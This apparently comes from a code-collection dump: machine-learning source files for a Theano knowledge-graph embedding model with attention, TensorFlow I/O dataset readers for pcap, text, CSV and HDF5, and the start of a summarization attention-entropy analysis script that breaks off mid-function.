h_tm1, probas = self.generate_step(h_tm1, h_T, cur_dec_idx)
# sample given the multinomial
cur_dec_idx = np.argwhere(numpy.random.multinomial(1, probas[0]) == 1)[0][0]
y_pred += [cur_dec_idx]
if cur_dec_idx == len(probas[0]) - 1:
# we sampled <EOS>
break
return y_pred
def preprocess(x, y):
# x, y = filter(lambda z: z != 0, x), filter(lambda z: z != 0, y)
sentence_enc = np.array(x).astype('int32')
sentence_dec = np.array([0] + y).astype('int32') - 1 # trick with 1-based indexing
target = np.array(y + [0]).astype('int32') - 1 # same
return sentence_enc, sentence_dec, target
def main(nsamples=10000,
n_hidden=128,
lr=0.01,
nepochs=100,
batch_size=64,
val_freq=1):
INVERT = False
DIGITS = 3
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+ '
n_classes = len('0123456789') + 1 # add <eos>
voc_size = len('0123456789+') + 1 # add <bos> for the decoder
# generate the dataset
ctable = CharacterTable(chars, MAXLEN)
X_train, X_val, y_train, y_val = generate_train_data(nsamples)
# build the model
m = model(nh=n_hidden,
nc=n_classes,
ne=voc_size,
batch_size=batch_size,
natt=20)
b_sentence_enc = np.zeros((batch_size, MAXLEN)).astype('int32')
b_sentence_dec = np.zeros((batch_size, DIGITS + 2)).astype('int32')
b_target = np.zeros((batch_size, DIGITS + 2)).astype('int32')
print(m.debug(b_sentence_enc, b_sentence_dec, b_target))
# training
for epoch in range(nepochs):
nlls = []
for batch_num in range(len(X_train) / batch_size):
b_sentence_enc = np.zeros((batch_size, MAXLEN)).astype('int32')
b_sentence_dec = np.zeros((batch_size, DIGITS + 1)).astype('int32')
b_target = np.zeros((batch_size, DIGITS + 1)).astype('int32')
for i in range(batch_size):
x, y = X_train[batch_num * batch_size + i], y_train[batch_num * batch_size + i]
sentence_enc, sentence_dec, target = preprocess(x, y)
b_sentence_enc[i,] = sentence_enc
b_sentence_dec[i,] = sentence_dec
b_target[i,] = target
nlls += [m.train(b_sentence_enc, b_sentence_dec, b_target, lr)]
print "%.2f %% completedi - nll = %.2f\r" % ((i + 1) * 100. / len(X_train), np.mean(nlls)),
sys.stdout.flush()
print
# evaluation
if (epoch + 1) % val_freq == 0:
for i, (x, y) in enumerate(zip(X_val, y_val)):
sentence_enc, sentence_dec, target = preprocess(x, y)
y_pred = m.generate_text(sentence_enc)
try:
print "ground-truth\t", np.concatenate([[sentence_dec[1]], target[:-1]])
print "predicted \t", y_pred
except IndexError:
pass
if i > 5:
break
if __name__ == "__main__":
main()
```
#### File: Attn-KGE/LSTM_fix/tmp_test.py
```python
# import numpy as np
#
# x = np.arange(60).reshape((3,4,5))
# mask = np.ones((3,4))
# mask[2][3] = 0
# mask[1][3] = 0
#
# W = np.ones((5,5))
# U = np.ones((5,5))
# rel = np.ones((5,))
#
#
# pctx = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + tensor.dot(rel, tparams[_p(prefix, 'U')]) + tparams[
# _p(prefix, 'b')]
#
#
# pctx_ = tensor.tanh(pctx)
#
#
# # seq, batch, dim *
# # alpha = 97,16,256 * 256, = 97,16
# alpha = tensor.dot(pctx_, tparams[_p(prefix, 'V')])
# alpha = tensor.exp(alpha)
# alpha = alpha * mask
# alpha = alpha / theano.tensor.sum(alpha, axis=0, keepdims=True)
# # alpha.sum(axis=0)
# # h = emb * alpha[:, :, None]
# # h = tensor.dot(state_below,alpha)
# # h = state_below * alpha[:, :, None]
# # alpha
# state = alpha[:, :, None] * state_below
# # proj = (h * mask[:, :, None]).sum(axis=0)
# # proj = proj / mask.sum(axis=0)[:, None]
# # proj = tensor.tanh(tensor.dot(proj, tparams[_p(prefix, 'O')]))
#
# # h is 97,16,128
#
# # def _step(m_, x_, h_):
# # h = m_[:, None] * x_ + (1. - m_)[:, None] * h_
# # return h
# #
# # rval, updates = theano.scan(_step,
# # sequences=[mask, state],
# # outputs_info=[tensor.alloc(numpy_floatX(0.),
# # n_samples,
# # options['edim'])],
# # name='attention_mask')
# # return rval[-1]
# proj = (state * mask[:, :, None]).sum(axis=0)
# proj = proj / mask.sum(axis=0)[:, None]
# return proj
#
```
#### File: Attn-KGE/LSTM_fix/util.py
```python
__author__ = 'jcxu'
from collections import OrderedDict
import theano
import theano.tensor as tensor
import numpy
import cPickle as pkl
import sys
import time
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from theano import config
import cPickle
# make prefix-appended name
def _p(pp, name):
return '%s_%s' % (pp, name)
def my_hash(option, h, l, r):
return h * (option['ent_num'] ** 2) + l * option['ent_num'] + r
def prepare_test_data(new_seq, maxlen=None):
lengths = [len(seq) for seq in new_seq]
n_samples = len(new_seq)
if maxlen is None:
maxlen = numpy.max(lengths)
for i, seq in enumerate(new_seq):
lengths[i] = numpy.minimum(maxlen, lengths[i])
x = numpy.zeros((maxlen, n_samples), dtype='int64')
x_mask = numpy.zeros((maxlen, n_samples), dtype='float32')
# x_mask = numpy.zeros((maxlen, n_samples),dtype='int64')
for idx, s in enumerate(new_seq):
x[:lengths[idx], idx] = s[:lengths[idx]]
x_mask[:lengths[idx], idx] = 1.
x_mask[0] = 1.
return x, x_mask
def prepare_data(seqs, maxlen=None):
"""Create the matrices from the datasets.
@param seqs: a list. shape = (batch_size, 4, seq_len)
This pad each sequence to the same length: the lenght of the
longest sequence or maxlen.
if maxlen is set, we will cut all sequence to this maximum
lenght.
This swap the axis!
"""
# x: a list of sentences
new_seq = []
for i in range(2):
for seq in xrange(len(seqs)):
new_seq.append(seqs[seq][i])
# new_seq: shape = (seq_len , batch_size * 4)]
lengths = [len(seq) for seq in new_seq]
n_samples = len(new_seq)
if maxlen is None:
maxlen = numpy.max(lengths)
for i, seq in enumerate(new_seq):
lengths[i] = numpy.minimum(maxlen, lengths[i])
x = numpy.zeros((maxlen, n_samples)).astype('int64')
x_mask = numpy.zeros((maxlen, n_samples)).astype(theano.config.floatX)
# x_mask = numpy.zeros((maxlen, n_samples),dtype='int64')
for idx, s in enumerate(new_seq):
x[:lengths[idx], idx] = s[:lengths[idx]]
x_mask[:lengths[idx], idx] = 1.
x_mask[0] = 1.
return x, x_mask
def neg_sample(options, size, samples, train_or_valid='valid'):
"""
@param size: samples needed
@param samples: which sample train/valid/test
#param train_or_valid: a string. 'train' or 'valid'
@return: [h, l, h', l', r, r'] means: [pos_sample, neg_sample]
"""
result = []
# for s in xrange(size / 2):
for s in xrange(size):
i = numpy.random.randint(0, len(samples))
j = numpy.random.randint(0, options['ent_num'])
k = numpy.random.randint(0, options['rel_num'])
h, l, r = samples[i][:]
pr = 1000 * options[train_or_valid + '_right_num'][r] / (
options[train_or_valid + '_right_num'][r] + options[train_or_valid + '_left_num'][r])
if options['method'] == 0:
pr = 500
if numpy.random.randint(0, 1000) < pr:
# while triple_count.has_key(h) and triple_count[h].has_key(r) and triple_count[h][r].has_key(j):
while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, h, j, r)):
j = numpy.random.randint(0, options['ent_num'])
result.append([h, l, h, j, r, r])
else:
# while triple_count.has_key(j) and triple_count[h].has_key(r) and triple_count[j][r].has_key(l):
while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, j, l, r)):
j = numpy.random.randint(0, options['ent_num'])
result.append([h, l, j, l, r, r])
# while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, h, l, k)):
# k = numpy.random.randint(0, options['rel_num'])
# result.append([h, l, h, l, r, k])
x, x_mask = prepare_data([[options['texts'][result[s][i]] for i in xrange(4)] for s in xrange(size)],
maxlen=options['max_len'])
return numpy.array(result), x, x_mask
def generate_test_text(tparams, options, f_test, epo_num, ttparams=None, build_test=None):
"""
With ATT: options['build_test'] = build_test
build_test util:
build_test(tparams, options, ttparams=None, relation_vec=True)
relation_vec means that relation is a vector, otherwise a matrix.
Without Att, with gate: options['test_text_embedding'] = test_text_embedding options['alpha'] = alpha
Without Att and gate: options['test_text_embedding'] = test_text_embedding
:param tparams:
:param options:
:param f_test:
:param epo_num:
:param ttparams:
:param build_test: Optional
:return:
"""
if ttparams == None:
ttparams = tparams
model_name, max_len = options['model_name'], options['max_len']
# if model_name == 'lstm' or model_name == 'blstm' or model_name == 'cbow'\
# or model_name=='lstm_gate' or model_name == 'lstm_gate_pro'\
# or model_name=='cbow_gate' or model_name=='cbow_gate_pro':
# t_text, t_mask = prepare_test_data(options['texts'], max_len)
# test_text_embedding = f_test(t_text, t_mask)[0]
# if (options['model_name'].find('att') != -1) and (options['data'].find('fb') != -1):
# test_num = len(options['test_samples'])
# x_left, x_mask_left = prepare_test_data(
# [options['texts'][options['test_samples'][s][0]] for s in xrange(test_num)],
# maxlen=options['max_len'])
#
# x_right, x_mask_right = prepare_test_data(
# [options['texts'][options['test_samples'][s][1]] for s in xrange(test_num)],
# maxlen=options['max_len'])
# assert len(numpy.sum(x_mask_left, axis=0).nonzero()[0]) == x_mask_left.shape[1]
# print 'Pass assertion test'
#
# relation_emb = ttparams['rel_emb'].get_value()
# rel_needed = [relation_emb[options['test_samples'][s][2]] for s in xrange(test_num)]
#
# left_test_text_embedding, __ = f_test(x_left, x_mask_left, rel_needed)
# right_test_text_embedding, __ = f_test(x_right, x_mask_right, rel_needed)
# options['test_text_embedding'] = [left_test_text_embedding, right_test_text_embedding]
#
# elif (options['model_name'].find('att') != -1):
# t_text, t_mask = prepare_test_data(options['texts'], max_len)
#
# # check zeros mask
# assert len(numpy.sum(t_mask, axis=0).nonzero()[0]) == t_mask.shape[1]
# print 'Pass assertion test'
# relation_emb = ttparams['rel_emb'].get_value()
# test_text_embedding = numpy.zeros((options['rel_num'], options['ent_num'], options['edim']))
#
# for i in xrange(options['rel_num']):
# tmp_test_text_embedding, __ = f_test(t_text, t_mask, relation_emb[i, :].reshape((options['edim'],)))
# test_text_embedding[i] = tmp_test_text_embedding[0]
# options['test_text_embedding'] = test_text_embedding
t_text, t_mask = prepare_test_data(options['texts'], max_len)
# TODO Attention
if options['model_name'].find('att')!=-1:
# if attention, pass the test function
assert build_test != None
options['build_test'] = build_test
# gate
elif options['model_name'].find('gate') != -1:
test_text_embedding, alpha = f_test(t_text, t_mask)
options['test_text_embedding'] = test_text_embedding
options['alpha'] = alpha
else:
test_text_embedding = f_test(t_text, t_mask)
options['test_text_embedding'] = test_text_embedding
if ttparams == None:
pkl.dump([tparams, options], open('t_o_test_%s_%s' % (options['saveto'], str(epo_num)), 'wb'))
else:
pkl.dump([ttparams, tparams, options], open('test_%s_%s' % (options['saveto'], str(epo_num)), 'wb'))
def max_norm(p, options):
s = numpy.square(p)
s_ = s.sum(axis=1, keepdims=True)
norms = numpy.sqrt(s_)
desired = numpy.clip(norms, 0, options['norm'])
return p * (desired / (1e-7 + norms))
# norms = K.sqrt(K.sum(K.square(p), axis=0))
# desired = K.clip(norms, 0, self.m)
# p = p * (desired / (1e-7 + norms))
def itemlist(tparams):
return [vv for kk, vv in tparams.iteritems()]
def adadelta(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rup2' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup+rg2up)
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads,
running_up2,
running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(itemlist(tparams), updir)]
f_update = theano.function([lr], [], updates=ru2up+param_up,
on_unused_input='ignore')
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup+rgup+rg2up)
updir = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_updir' % k)
for k, p in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(p, p + udn[1])
for p, udn in zip(itemlist(tparams), updir_new)]
f_update = theano.function([lr], [], updates=updir_new+param_up,
on_unused_input='ignore')
return f_grad_shared, f_update
def sgd(lr, tparams, grads, inputs, cost, lr_option=0.005):
""" Stochastic Gradient Descent
:note: A more complicated version of sgd then needed. This is
done like that for adadelta and rmsprop.
"""
# New set of shared variable that will contain the gradient
# for a mini-batch.
gshared = [theano.shared(p.get_value() * 0., name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
# Function that computes gradients for a mini-batch, but do not
# updates the weights.
f_grad_shared = theano.function(inputs, cost, updates=gsup,
name='sgd_f_grad_shared')
pup = [(p, p - lr * g) for p, g in zip(tparams.values(), gshared)]
######
# idx_ent = tparams.keys().index('ent_emb')
# idx_rel = tparams.keys().index('rel_emb')
#
# tuple_ent = (tparams.get('ent_emb'), tparams.get('ent_emb') - lr_option * lr * gshared[idx_ent])
# tuple_rel = (tparams.get('rel_emb'), tparams.get('rel_emb') - lr_option * lr * gshared[idx_rel])
#
# pup[idx_ent] = tuple_ent
# pup[idx_rel] = tuple_rel
list = ['attention_W','attention_U','attention_b','attention_V']
for i in list:
idx = tparams.keys().index(i)
tuple = (tparams.get(i), tparams.get(i) - (1./lr_option) * lr * gshared[idx])
pup[idx] = tuple
######
# Function that updates the weights from the previously computed
# gradient.
f_update = theano.function([lr], [], updates=pup,
name='sgd_f_update')
return f_grad_shared, f_update
def adagrad(lr, tparams, grads, inputs, cost):
zipped_grads = [theano.shared(p.get_value() * numpy_floatX(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy_floatX(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, rg2 + g ** 2) for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inputs, cost, updates=zgup + rg2up,
name='adagrad_f_grad_shared')
updir = [-zg / tensor.sqrt(rg2 + 1e-6)
for zg, rg2 in zip(zipped_grads,
running_grads2)]
param_up = [(p, p + lr * ud) for p, ud in zip(tparams.values(), updir)]
# idx = tparams.keys().index('Wemb')
# param_up.pop(idx) # Remove the Wemb
# new_tuple = (tparams.get('Wemb'), tparams.get('Wemb') + 0.1 * updir[idx])
# param_up.append(new_tuple)
f_update = theano.function([lr], [], updates=param_up,
name='adagrad_f_update')
return f_grad_shared, f_update
def numpy_floatX(data):
return numpy.asarray(data, dtype=config.floatX)
def ortho_weight(indim, outdim=None):
if outdim is None:
W = numpy.random.uniform(low=-.05, high=.05, size=(indim, indim)).astype(config.floatX)
# W = numpy.random.uniform(
# low=-m * numpy.sqrt(6. / (indim + indim)),
# high=m * numpy.sqrt(6. / (indim + indim)),
# size=(indim, indim)).astype(config.floatX)
else:
W = numpy.random.uniform(low=-.05, high=.05, size=(indim, outdim)).astype(config.floatX)
return W
def concatenate(tensor_list, axis=0):
"""
Alternative implementation of `theano.tensor.concatenate`.
This function does exactly the same thing, but contrary to Theano's own
implementation, the gradient is implemented on the GPU.
Backpropagating through `theano.tensor.concatenate` yields slowdowns
because the inverse operation (splitting) needs to be done on the CPU.
This implementation does not have that problem.
:usage:
>>> x, y = theano.tensor.matrices('x', 'y')
>>> c = concatenate([x, y], axis=1)
:parameters:
- tensor_list : list
list of Theano tensor expressions that should be concatenated.
- axis : int
the tensors will be joined along this axis.
:returns:
- out : tensor
the concatenated tensor expression.
"""
concat_size = sum(tt.shape[axis] for tt in tensor_list)
output_shape = ()
for k in range(axis):
output_shape += (tensor_list[0].shape[k],)
output_shape += (concat_size,)
for k in range(axis + 1, tensor_list[0].ndim):
output_shape += (tensor_list[0].shape[k],)
out = tensor.zeros(output_shape)
offset = 0
for tt in tensor_list:
indices = ()
for k in range(axis):
indices += (slice(None),)
indices += (slice(offset, offset + tt.shape[axis]),)
for k in range(axis + 1, tensor_list[0].ndim):
indices += (slice(None),)
out = tensor.set_subtensor(out[indices], tt)
offset += tt.shape[axis]
return out
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
raise Warning('%s is not in the archive' % kk)
params[kk] = pp[kk]
return params
def new_load_params(path, old_params):
file = open(path, 'r')
x = cPickle.load(file)
if len(x) == 3:
pp1, pp2, opt = x
file.close()
param = old_params
if type(pp1) == type([]):
for i in xrange(len(pp1)):
kk = pp1[i].name
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp1[i].get_value()
else:
for kk in pp1:
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp1[kk]
if type(pp2) == type([]):
for i in xrange(len(pp2)):
kk = pp2[i].name
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp2[i].get_value()
else:
for kk in pp2:
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp2[kk]
for i in param:
print i, type(param[i])
return param
elif len(x) == 2:
par, option = x
param = old_params
for kk in par:
if param.has_key(kk):
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = par[kk]
for i in param:
print i, type(param[i])
return param
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
try:
tparams[kk] = theano.shared(params[kk], name=kk)
except:
tparams[kk] = params[kk]
finally:
print('Load %s in ttp shape:%s\tmean:%s' % (
kk, tparams[kk].get_value().shape, tparams[kk].get_value().mean()))
return tparams
def init_tparams_fix(params):
tparams = OrderedDict()
ttparams = OrderedDict()
for kk, pp in params.iteritems():
if kk == 'ent_emb' or kk == 'rel_emb':
try:
ttparams[kk] = theano.shared(params[kk], name=kk)
except:
ttparams[kk] = params[kk]
finally:
print('Load %s in ttp shape:%s\tmean:%s' % (
kk, ttparams[kk].get_value().shape, ttparams[kk].get_value().mean()))
else:
try:
tparams[kk] = theano.shared(params[kk], name=kk)
except:
tparams[kk] = params[kk]
finally:
print('Load %s in tparam shape:%s\tmean:%s' % (
kk, tparams[kk].get_value().shape, tparams[kk].get_value().mean()))
return tparams, ttparams
def zipp(params, tparams):
"""
When we reload the model. Needed for the GPU stuff.
"""
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
def unzip(zipped):
"""
When we pickle the model. Needed for the GPU stuff.
"""
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
def get_minibatches_idx(n, minibatch_size, shuffle=True):
"""
Used to shuffle the dataset at each iteration.
Args:
n: total length
minibatch_size: batch size
shuffle: shuffle data
Returns:zip(range(len(minibatches)), minibatches)
"""
idx_list = numpy.arange(n, dtype="int64")
if shuffle:
numpy.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range(n // minibatch_size):
minibatches.append(idx_list[minibatch_start:
minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if (minibatch_start != n):
# Make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)), minibatches)
def dropout_layer(state_before, use_noise, trng, noise=0.5):
proj = tensor.switch(use_noise,
state_before * trng.binomial(state_before.shape, p=(1 - noise), n=1, dtype=state_before.dtype),
state_before * (1 - noise))
return proj
def pred_probs(f_pred_prob, prepare_data, data, iterator, verbose=False):
""" If you want to use a trained model, this is useful to compute
the probabilities of new examples.
"""
n_samples = len(data[0])
probs = numpy.zeros((n_samples, 2)).astype(config.floatX)
n_done = 0
for _, valid_index in iterator:
x, mask, y = prepare_data([data[0][t] for t in valid_index],
numpy.array(data[1])[valid_index],
maxlen=None)
pred_probs = f_pred_prob(x, mask)
probs[valid_index, :] = pred_probs
n_done += len(valid_index)
if verbose:
print '%d/%d samples classified' % (n_done, n_samples)
return probs
def pred_error(f_pred, prepare_data, data, iterator, verbose=False):
"""
Just compute the error
f_pred: Theano fct computing the prediction
prepare_data: usual prepare_data for that dataset.
"""
valid_err = 0
for _, valid_index in iterator:
x, mask, y = prepare_data([data[0][t] for t in valid_index],
numpy.array(data[1])[valid_index],
maxlen=None)
preds = f_pred(x, mask)
targets = numpy.array(data[1])[valid_index]
valid_err += (preds == targets).sum()
valid_err = 1. - numpy_floatX(valid_err) / len(data[0])
return valid_err
``` |
{
"source": "jiachengxu/io",
"score": 2
} |
#### File: python/ops/pcap_ops.py
```python
import tensorflow as tf
from tensorflow_io.core.python.ops import data_ops
from tensorflow_io.core.python.ops import _load_library
pcap_ops = _load_library('_pcap_ops.so')
class PcapDataset(data_ops.Dataset):
"""A pcap Dataset. Pcap is a popular file format for capturing network packets.
"""
def __init__(self, filenames, batch=None):
"""Create a pcap Reader.
Args:
filenames: A `tf.string` tensor containing one or more filenames.
"""
batch = 0 if batch is None else batch
dtypes = [tf.float64, tf.string]
shapes = [
tf.TensorShape([]), tf.TensorShape([])] if batch == 0 else [
tf.TensorShape([None]), tf.TensorShape([None])]
super(PcapDataset, self).__init__(
pcap_ops.pcap_dataset,
pcap_ops.pcap_input(filenames),
batch, dtypes, shapes)
```
#### File: python/ops/text_ops.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ast
import csv
import numpy as np
import tensorflow as tf
from tensorflow_io.core.python.ops import data_ops
from tensorflow_io.core.python.ops import core_ops
def read_text(filename, **kwargs):
"""read_text"""
memory = kwargs.get("memory", "")
offset = kwargs.get("offset", 0)
length = kwargs.get("length", -1)
return core_ops.read_text(
filename, offset=offset, length=length, memory=memory)
def save_text(dataset, filename):
"""Save Dataset to disk.
Args:
dataset: A TextDataset to be saved.
filename: A `tf.string` tensor containing filename.
"""
return core_ops.text_dataset_output(dataset._variant_tensor, filename) # pylint: disable=protected-access
def save_csv(dataset, filename):
"""Save Dataset to disk.
Args:
dataset: A Dataset to be saved.
filename: A `tf.string` tensor containing filename.
"""
return core_ops.csv_dataset_output(dataset._variant_tensor, filename) # pylint: disable=protected-access
def re2_full_match(input, pattern): # pylint: disable=redefined-builtin
"""Extract regex groups
Args:
dataset: A `tf.string` tensor
pattern: A pattern string.
"""
return core_ops.re2_full_match(input, pattern)
class TextDataset(data_ops.BaseDataset):
"""A Text Dataset"""
def __init__(self, filename, **kwargs):
"""Create a Text Reader.
Args:
filename: A string containing filename to read.
"""
dtype = tf.string
shape = tf.TensorShape([None])
capacity = kwargs.get("capacity", 65536)
if filename.startswith("file://-") or filename.startswith("file://0"):
dataset = data_ops.BaseDataset.range(1).map(
lambda length: core_ops.read_text(filename, memory="", offset=0, length=length)
)
else:
filesize = tf.io.gfile.GFile(filename).size()
# capacity is the rough length for each split
entry_offset = list(range(0, filesize, capacity))
entry_length = [
min(capacity, filesize - offset) for offset in entry_offset]
dataset = data_ops.BaseDataset.from_tensor_slices(
(
tf.constant(entry_offset, tf.int64),
tf.constant(entry_length, tf.int64)
)
).map(lambda offset, length: core_ops.read_text(
filename, memory="",
offset=offset, length=length))
self._dataset = dataset
super(TextDataset, self).__init__(
self._dataset._variant_tensor, [dtype], [shape]) # pylint: disable=protected-access
class TextOutputSequence(object):
"""TextOutputSequence"""
def __init__(self, filenames):
"""Create a `TextOutputSequence`.
"""
self._filenames = filenames
self._resource = core_ops.text_output_sequence(destination=filenames)
def setitem(self, index, item):
core_ops.text_output_sequence_set_item(self._resource, index, item)
def _infer_dtype(val):
"""_infer_dtype"""
try:
val = ast.literal_eval(val)
except (SyntaxError, ValueError):
return tf.string
if isinstance(val, int):
if np.int32(val) == val:
return tf.int32
elif np.int64(val) == val:
return tf.int64
elif isinstance(val, float):
if np.float32(val) == val:
return tf.float32
elif np.float64(val) == val:
return tf.float64
return tf.string
def from_csv(filename, header=0):
"""Read csv to Dataset
NOTE: Experimental and eager only!
Args:
filename: A `tf.string` tensor containing filename.
"""
if not tf.executing_eagerly():
raise NotImplementedError("from_csv only supports eager mode")
dataset = TextDataset(filename).apply(tf.data.experimental.unbatch())
columns = None
if header is not None:
if header != 0:
raise NotImplementedError(
"from_csv only supports header=0 or header=None for now")
# Read first linea as name
columns = list(
csv.reader([line.numpy().decode() for line in dataset.take(1)]))[0]
dataset = dataset.skip(1)
entries = list(
csv.reader([line.numpy().decode() for line in dataset.take(1)]))[0]
if columns is None:
columns = [i for (i, _) in enumerate(entries)]
dtypes = [_infer_dtype(column) for column in entries]
specs = [
tf.TensorSpec(tf.TensorShape([]), dtype, column) for (
column, dtype) in zip(columns, dtypes)]
record_defaults = [tf.zeros(spec.shape, spec.dtype) for spec in specs]
return tf.data.experimental.CsvDataset(
filename, record_defaults, header=(header is not None)), specs
```
#### File: io/tests/test_hdf5_eager.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
if not (hasattr(tf, "version") and tf.version.VERSION.startswith("2.")):
tf.compat.v1.enable_eager_execution()
import tensorflow_io.hdf5 as hdf5_io # pylint: disable=wrong-import-position
def test_hdf5_list_dataset():
"""test_hdf5_list_dataset"""
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"test_hdf5", "h5ex_g_traverse.h5")
# Without file:// file will be opened directly, otherwise
# file will be opened in memory.
for filename in [filename, "file://" + filename]:
specs = hdf5_io.list_hdf5_datasets(filename)
assert specs['/group1/dset1'].dtype == tf.int32
assert specs['/group1/dset1'].shape == tf.TensorShape([1, 1])
assert specs['/group1/group3/dset2'].dtype == tf.int32
assert specs['/group1/group3/dset2'].shape == tf.TensorShape([1, 1])
def test_hdf5_read_dataset():
"""test_hdf5_list_dataset"""
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"test_hdf5", "tdset.h5")
for filename in [filename, "file://" + filename]:
specs = hdf5_io.list_hdf5_datasets(filename)
assert specs['/dset1'].dtype == tf.int32
assert specs['/dset1'].shape == tf.TensorShape([10, 20])
assert specs['/dset2'].dtype == tf.float64
assert specs['/dset2'].shape == tf.TensorShape([30, 20])
p1 = hdf5_io.read_hdf5(filename, specs['/dset1'])
assert p1.dtype == tf.int32
assert p1.shape == tf.TensorShape([10, 20])
for i in range(10):
vv = list([np.asarray([v for v in range(i, i + 20)])])
assert np.all(p1[i].numpy() == vv)
dataset = hdf5_io.HDF5Dataset(filename, '/dset1').apply(
tf.data.experimental.unbatch())
i = 0
for p in dataset:
vv = list([np.asarray([v for v in range(i, i + 20)])])
assert np.all(p.numpy() == vv)
i += 1
if __name__ == "__main__":
test.main()
``` |
{
"source": "jiacheng-xu/text-sum-uncertainty",
"score": 2
} |
#### File: jiacheng-xu/text-sum-uncertainty/attention_y_entropy.py
```python
import itertools
import os, random
import statistics
import matplotlib
import matplotlib.pyplot as plt
from analyze_entropy import comp_entropy
from analyze_prob_attn import compute_idf, get_ban_positions
# from data_collection import CUR_DIR, PROB_META_DIR, spec_name, MODEL_NAME, DATA_NAME
from util import convert_enc_attn, parse_arg
from matplotlib.ticker import (MultipleLocator, FormatStrFormatter,
AutoMinorLocator)
font_size = 14
matplotlib.font_manager._rebuild()
GLOBAL_FIGURE_WIDTH = 8
dpi = 800
# plt.rcParams["font.weight"] = "light"
plt.rcParams.update({'font.size': 14})
plt.rcParams['font.family'] = 'DejaVu Sans'
dir_datadrive = '/mnt/data0/jcxu/data/prob_gpt'
# Density: x: entropy, two plots: is bigram or not
FIG_SIZE_x = GLOBAL_FIGURE_WIDTH
def get_ys(t, logits, BOS_token=0):
# for one time step, get the tokens last_inp, cur_inp, cur_pred, and next_pred
cur_pred = logits[t]
try:
next_pred = logits[t + 1]
except IndexError:
next_pred = None
if t - 2 >= 0:
last_inp = logits[t - 2]
elif t - 2 == -1:
last_inp = BOS_token
else:
last_inp = None
if t - 1 >= 0:
cur_inp = logits[t - 1]
elif t - 1 == -1:
cur_inp = BOS_token
else:
cur_inp = None
return last_inp, cur_inp, cur_pred, next_pred
from collections import Counter
def truncate_attention_cell(attn_distb, input_doc, idf_ban_pos, tgt_prob_mass=0.9) -> Counter:
# for each attention distribution, remove the idf ban tokens (positions), get the accumulated prob up to prob_mass.
# return
sorts = np.argsort(attn_distb, axis=-1, kind=None, order=None)[::-1]
cum_prob_mass = 0
cnt = Counter()
for topk in sorts:
prob_mass = attn_distb[topk]
cum_prob_mass += prob_mass
if topk not in idf_ban_pos:
cnt[input_doc[topk]] = prob_mass
if cum_prob_mass > tgt_prob_mass or prob_mass < 0.01:
break
return cnt
def _y_entropy_step(attn_lle, input_doc, idf_ban_pos):
num_layer, num_head, src_len = attn_lle.shape
all_attns = Counter()
for l in range(num_layer):
for h in range(num_head):
